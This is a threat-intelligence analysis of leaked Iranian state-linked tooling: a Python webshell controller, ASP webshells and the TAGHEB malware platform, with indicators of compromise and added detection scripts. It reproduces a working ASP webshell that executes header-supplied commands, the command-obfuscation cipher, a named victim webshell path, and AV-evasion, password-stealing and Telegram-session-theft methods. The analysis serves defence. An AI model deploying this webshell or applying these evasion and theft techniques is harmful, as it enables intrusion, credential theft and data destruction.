
Framework Overview

CharmingKitten developed a dedicated Python & Webshells Framework for managing compromised systems. The framework consists of:
  1. Python Command Interface - Attacker-side command management system
  2. Webshells - Victim-side command execution engines
  3. Communication Protocol - Custom encoding and header-based command delivery

Python Command Management Interface

The Python script (connect.py) provides an interactive shell interface for managing webshell-compromised systems.

Features

Interactive Command Line:
  • Tab completion for commands
  • Command history
  • Target selection menu
  • Custom encoding for command obfuscation
Supported Commands:
  • help - Display available commands
  • exit - Exit the current session
  • Any system command - Executed remotely on victim

Custom Encoding Scheme

The framework uses a character substitution cipher to obfuscate commands:
def encode(input_string):
    en = rf"AB_CDEFG.HIJKLM!$%&*()?NOPQR-STUVWXYZabcdefghijklmnopqrstu=vwxyz0123456789/"
    de = rf"Qk3\afcPbYJTGywSv=0Egdx62X-NRVz!~$%_*()?Uq7os1ijFMuLOetCl98K5hBDn4.prWAHmIZ"
    translation_table = str.maketrans(en, de)
    encoded_string = input_string.translate(translation_table)
    return encoded_string
This encoding makes network traffic analysis more difficult and evades simple signature-based detection.

Target Configuration

The Python interface includes hardcoded victim targets.
Example Target:
TargetURL = "https://uniforms.flydubai.com/images/flash/test9/m0s.phto"
This indicates a compromise of FlyDubai (Dubai’s aviation company) infrastructure.

HTTP Communication

Commands are transmitted via HTTP headers:
headers = {
    "Accept-Captcha": "am=JgAAgP7jP38JwxmUgBgbuF8P_Nmlh2EEBhzhIQOBCEgGdAeWqYD_xNXr3UBFH35AAgACOJqOmhmdA2KVQwAEsGJYhhEAAAAAAAAAAA",
    "Accept-Language": "whoami",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"
}
Command Delivery:
  • Commands are placed in the Accept-Language header
  • Custom Accept-Captcha header may serve as authentication token
  • Response contains command output in HTTP response body
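To turn the command channel described above (and the substitution table from the Custom Encoding Scheme section) into a triage check, here is an added example written for this page, not code from the leaked framework. It flags requests that carry the non-standard Accept-Captcha header or an Accept-Language value that does not parse as a language-tag list, and applies the inverse of the published table to flagged values; the language-tag grammar is a heuristic, and the sample requests are constructed.

```python
import re

# Substitution alphabets exactly as they appear in the leaked connect.py encode().
EN = r"AB_CDEFG.HIJKLM!$%&*()?NOPQR-STUVWXYZabcdefghijklmnopqrstu=vwxyz0123456789/"
DE = r"Qk3\afcPbYJTGywSv=0Egdx62X-NRVz!~$%_*()?Uq7os1ijFMuLOetCl98K5hBDn4.prWAHmIZ"
DECODE_TABLE = str.maketrans(DE, EN)  # inverse mapping: header value -> command

# Heuristic language-range grammar: 2-3 letter ISO 639 primary subtag (browsers send
# nothing longer in practice), optional subtags, optional ;q= weight.
TAG_RE = re.compile(r"\*|[A-Za-z]{2,3}(-[A-Za-z0-9]{1,8})*")
Q_RE = re.compile(r"q=(0(\.\d{1,3})?|1(\.0{1,3})?)")

def looks_like_language_tags(value: str) -> bool:
    """True if every comma-separated item is a language range with optional weight."""
    for item in value.split(","):
        tag, _, weight = item.strip().partition(";")
        if not TAG_RE.fullmatch(tag.strip()):
            return False
        if weight and not Q_RE.fullmatch(weight.strip()):
            return False
    return True

def decode_command(value: str) -> str:
    """Apply the inverse of the framework's substitution table."""
    return value.translate(DECODE_TABLE)

def triage_request(headers: dict) -> dict:
    """Flag one request whose headers match the webshell command channel."""
    accept_language = headers.get("Accept-Language", "")
    findings = []
    if "Accept-Captcha" in headers:
        findings.append("non-standard Accept-Captcha header present")
    if accept_language and not looks_like_language_tags(accept_language):
        findings.append("Accept-Language does not parse as a language-tag list")
    # Analysts compare raw and decoded: at most one of them reads as a command.
    return {"suspicious": bool(findings), "findings": findings, "raw": accept_language,
            "decoded": decode_command(accept_language) if findings else ""}

# Constructed sample requests (not captured traffic): a browser, the plaintext
# command from the leaked headers dict, and a table-encoded command.
SAMPLES = [
    {"Accept-Language": "en-US,en;q=0.9", "User-Agent": "Mozilla/5.0"},
    {"Accept-Language": "whoami", "Accept-Captcha": "am=<token>", "User-Agent": "Mozilla/5.0"},
    {"Accept-Language": "5sL(M1", "User-Agent": "Mozilla/5.0"},
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(triage_request(sample))
```

A single lowercase word such as whoami is syntactically a valid language range, which is why the primary-subtag length limit and the Accept-Captcha check matter more than the grammar alone.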

ASP Webshells

The framework includes multiple ASP webshells designed for IIS server deployment.

Core Webshell (webshell.asp)

Functionality:
<% Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

Dim acceptLanguage
acceptLanguage = Request.ServerVariables("HTTP_ACCEPT_LANGUAGE")

If acceptLanguage <> "" Then
    thisDir = getCommandOutput("cmd /c" & acceptLanguage)
    Response.Write(thisDir)
Else
    Response.Status = "404 Not Found"
    Response.End
End If
%>
Key Features:
  • Executes commands passed via Accept-Language header
  • Returns 404 status if header is missing (stealth)
  • Executes arbitrary Windows commands via cmd /c
  • Minimal code footprint for reduced detection

Webshell Variants

The framework includes multiple webshell files:
  • webshell.asp - Basic command execution
  • m0s.asp - Variant with additional capabilities
  • file.asp - File management operations
  • rce5.py - Python-based remote code execution
  • RCE4.py - Alternative Python RCE implementation

TAGHEB System

The “TAGHEB System” (سامانه ثاقب) is a comprehensive Windows malware platform developed by Department 40.
TAGHEB (ثاقب) translates to “penetrating” or “piercing” in Persian, reflecting its purpose as a penetration tool.

Technical Documentation

The exposed technical documentation reveals a sophisticated multi-module malware system:

Architecture

Core Components:
  1. Main Module - Primary control program
  2. Keylogger Module (klg.dll) - Keyboard monitoring
  3. Ransomware Module (rns.dll) - File destruction capability
  4. Stealer Module (stler.dll) - Firefox password extraction
  5. Telegram Module (telg.dll) - Telegram session theft

Module Loading System

The malware uses a sophisticated module loading system.
Encoded Modules:
  • Modules stored as .bin files on server
  • Hex-encoded to evade AV detection during transfer
  • Decoded on victim system to .dat files
  • Loaded via LoadLibrary() or rundll32.exe
Module Mapping:
central.dat  → Updated main executable
creds.dat    → Firefox stealer module
lock.dat     → File destruction module
logging.dat  → Keylogger module
msg.dat      → Telegram module

Communication Architecture

TAGHEB supports both direct and relay-based C2.
Direct Communication:
  • Agent connects directly to control panel server
Relay Communication:
  • Agent sends data to relay servers
  • Relay forwards to control panel
  • “Change home” capability for relay failover
Traffic Encryption:
  • All traffic encrypted with XOR cipher
  • String obfuscation using obfuscator.py script
  • Random timing intervals for beacon traffic

Keylogger Module

Supports Hebrew and English keyboard layouts:
KeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, keyboardHookProc, hInstance, NULL);
Capabilities:
  • Captures all keystrokes
  • Records active window titles
  • Encrypted storage on disk
  • Start/stop capability from control panel

Ransomware Module

Destructive file encryption capability.
Operation:
  • Targets first and last few kilobytes of files
  • Randomized character replacement algorithm
  • Irreversible destruction
  • Excludes AV installation directories
AV Directory Exclusions:
  • BitDefender installation path
  • Kaspersky installation path
  • Other major AV products

Stealer Module

Extracts saved passwords from Firefox.
Method:
  • Loads Firefox’s nss3.dll library
  • Uses PK11SDR_Decrypt() to decrypt passwords
  • Extracts from logins.json profile file
  • Supports Firefox 64-bit only

Telegram Module

Steals Telegram Desktop session files.
Target Files:
  • D877F783D5D3EF8Cs - Session data
  • key_datas - Encryption keys
  • maps - Configuration file
Process:
  1. Searches disk for session files
  2. Base64 encodes file contents
  3. Transmits to C2 server
  4. Enables account takeover (without cloud password)

Anti-Virus Evasion Testing

The documents include extensive AV testing results, demonstrating systematic evasion development.

Tested AV Products

  • Microsoft Defender
  • Kaspersky
  • Avira
  • ESET
  • BitDefender
  • Others

FUD Techniques (Fully Undetectable)

The technical documentation describes multiple techniques used to evade AV detection:

1. Modular Architecture

Breaking malware into multiple files:
  • Main executable (.exe)
  • Plugin modules (.dll)
  • Reduces detection surface

2. String Storage as Arrays

In C++, storing strings as character arrays instead of string literals:
// Harder to detect
char str[] = {'h','e','l','l','o'};

// Easier to detect  
string str = "hello";

3. String Obfuscation

Using obfuscator.py to shift characters:
Original: "http://example.com"
Obfuscated: "a6RG<@8BHGRfXR@BI8R"

4. Avoiding Sensitive Operations

  • Minimal registry modifications
  • Reduced network connections
  • No process injection
  • Limited file system operations

5. BAT File Execution

Using .bat scripts as intermediary:
timeout 3
start [main]
timeout 10
start rundll32 [module] snrProc
This indirection evades direct execution monitoring.

6. Module Encoding

Hex encoding modules during storage:
  • Stored as .bin files (hex-encoded)
  • Downloaded to victim
  • Decoded to .dat files (non-standard extension)
  • Avoids detection during download and storage
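An added scanner example (not from the leaked documentation) for the staging format described here and in the Module Loading System section: it recognizes a hex-encoded PE image in a .bin file and a decoded PE image in a .dat file. The PE header is a constructed stub, and the file names are samples.

```python
import binascii
import re
import struct
from typing import Optional

HEX_TEXT_RE = re.compile(rb"[0-9A-Fa-f\s]+")

def decode_hex_blob(data: bytes) -> Optional[bytes]:
    """Return decoded bytes if `data` is a pure hex text blob, else None."""
    if not data or not HEX_TEXT_RE.fullmatch(data):
        return None
    compact = b"".join(data.split())
    if len(compact) % 2:
        return None
    return binascii.unhexlify(compact)

def is_pe_image(blob: bytes) -> bool:
    """Check the MZ magic and that e_lfanew points at a 'PE\\0\\0' signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def classify_module_file(data: bytes) -> str:
    """Label file contents the way a plugin-directory scanner would."""
    if is_pe_image(data):
        return "pe-image"            # e.g. a decoded .dat staged for LoadLibrary/rundll32
    decoded = decode_hex_blob(data)
    if decoded is not None and is_pe_image(decoded):
        return "hex-encoded-pe"      # the .bin staging format described above
    return "other"

def build_fake_pe() -> bytes:
    """Constructed minimal MZ/PE header (not an executable) used only for the demo."""
    header = bytearray(0x80)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)   # e_lfanew -> PE signature offset
    header[0x40:0x44] = b"PE\0\0"
    return bytes(header)

# Constructed samples: the fake PE, its hex-encoded .bin form, and plain text.
SAMPLES = {
    "central.dat": build_fake_pe(),
    "central.bin": binascii.hexlify(build_fake_pe()),
    "readme.txt": b"hello world",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, classify_module_file(data))
```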

7. Traffic Encryption

XOR encryption of C2 traffic:
  • Prevents network signature detection
  • Makes traffic analysis difficult

Deployment Strategy

Different execution methods are used depending on which AV product is present.
BitDefender & Kaspersky:
  • Use LoadLibrary() for module loading
Other AV Products:
  • Use rundll32.exe via BAT file
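As an added example of detection logic (not the page's or the malware's code) for the BAT and rundll32 deployment path, this triages constructed process-creation records using Sysmon-style field names (Image, CommandLine, ParentImage, ParentCommandLine); the entry-point name snrProc and the .dat module names come from the BAT snippet and module mapping above, the paths are made up.

```python
import re
from pathlib import PureWindowsPath

# Locations from which rundll32 loading a module is unexpected on a server.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\tmp\\", "\\users\\public\\")

def module_argument(command_line: str) -> str:
    """Extract the module path from 'rundll32 <module>,<entry>' or 'rundll32 <module> <entry>'."""
    parts = re.split(r"\s+", command_line.strip(), maxsplit=1)
    if len(parts) < 2:
        return ""
    return parts[1].split(",", 1)[0].split()[0].strip('"')

def triage_process_event(event: dict) -> list:
    """Return findings for one process-creation record (Sysmon Event ID 1 style fields)."""
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    parent = PureWindowsPath(event.get("ParentImage", "")).name.lower()
    findings = []
    if image != "rundll32.exe":
        return findings
    module = module_argument(event.get("CommandLine", ""))
    if module and PureWindowsPath(module).suffix.lower() != ".dll":
        findings.append(f"rundll32 loading module with non-DLL extension: {module}")
    if any(d in module.lower() for d in USER_WRITABLE):
        findings.append("rundll32 module resides in a user-writable directory")
    if parent == "cmd.exe" and ".bat" in event.get("ParentCommandLine", "").lower():
        findings.append("rundll32 started from a .bat intermediary")
    return findings

# Constructed events: the BAT-launched module load described above, and a benign
# Control Panel invocation of rundll32 for comparison.
SAMPLES = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 C:\Users\Public\plugins\logging.dat snrProc",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": r"cmd /c C:\Users\Public\run.bat"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": "explorer.exe"},
]

if __name__ == "__main__":
    for event in SAMPLES:
        print(event["CommandLine"], "->", triage_process_event(event))
```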

Real-World Victim Evidence

FlyDubai Compromise

The Python script reveals a successful compromise:
  • Target: uniforms.flydubai.com
  • Webshell Path: /images/flash/test9/m0s.phto
  • Company: FlyDubai (UAE aviation company)
This represents a significant compromise of aviation industry infrastructure.

Turkish Foreign Ministry (Cross-Reference)

As documented in the BellaCiao analysis, the webshell framework was also used against Turkish government infrastructure.

Training Materials

The documents include training programs for Department 40 operatives:
  • Technical malware development
  • AV evasion techniques
  • Target reconnaissance
  • Infrastructure management

Intelligence Value

This framework exposure provides:
  1. Detection Signatures - For identifying compromised systems
  2. TTPs - Tactics, techniques, and procedures for threat hunting
  3. Infrastructure Indicators - Domains, paths, and patterns
  4. Capability Assessment - Understanding attacker skill level
Organizations should scan web-accessible directories for files with unexpected extensions (.phto, .dat) and review IIS logs for suspicious Accept-Language header patterns. Note that Accept-Language is not among the default W3C log fields, so it has to be enabled as a custom request-header field (IIS 8.5 and later) or captured at a reverse proxy or WAF in front of the server.

Indicators of Compromise

File Indicators

/images/flash/test9/m0s.phto
central.dat
creds.dat
lock.dat
logging.dat
msg.dat
*.bin (in plugins directories)

Network Indicators

  • HTTP requests with encoded commands in Accept-Language header
  • Custom Accept-Captcha header values
  • XOR-encrypted C2 traffic

Behavioral Indicators

  • Webshells returning 404 for normal requests
  • rundll32.exe executing from temporary directories
  • Suspicious .bat files in system directories
  • Module files with .dat extension in unusual locations
